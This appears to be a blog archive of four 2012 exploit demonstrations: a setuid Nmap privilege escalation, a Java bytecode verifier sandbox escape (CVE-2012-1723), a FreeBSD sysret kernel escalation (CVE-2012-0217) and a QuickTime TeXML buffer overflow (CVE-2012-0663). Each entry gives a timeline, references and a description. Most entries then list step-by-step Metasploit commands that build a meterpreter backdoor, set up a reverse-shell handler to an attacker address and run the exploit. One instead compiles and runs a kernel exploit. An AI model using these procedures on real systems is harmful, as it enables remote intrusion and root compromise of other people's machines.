Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided the 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You will require to have an active session on the target, this session could be done  through a backdoor.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-06-12
First PoC provided by Michael Schierl the 2012-06-13
Metasploit PoC provided the 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0217 Intel’s sysret Kernel Privilege Escalation on FreeBSD Demo

Timeline :

Vulnerability discovered by Rafal Wojtczuk
Coordinate public release of the vulnerability the 2012-06-12
FreeBSD PoC provided by fail0verflow the 2012-07-05

PoC provided by :

Rafal Wojtczuk
John Baldwin
fail0verflow

Reference(s) :

CVE-2012-0217
OSVDB-82949
FreeBSD-SA-12:04.sysret

Affected version(s) :

All supported versions of FreeBSD previous

Tested on FreeBSD 9.0-RELEASE

Description :

FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. To exploit this vulnerability, an attacker must be able to run code with user privileges on the target system.

Commands :

uname -a
id
gcc -o CVE-2012-0217-sysret_FreeBSD CVE-2012-0217-sysret_FreeBSD.c
./CVE-2012-0217-sysret_FreeBSD
id

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid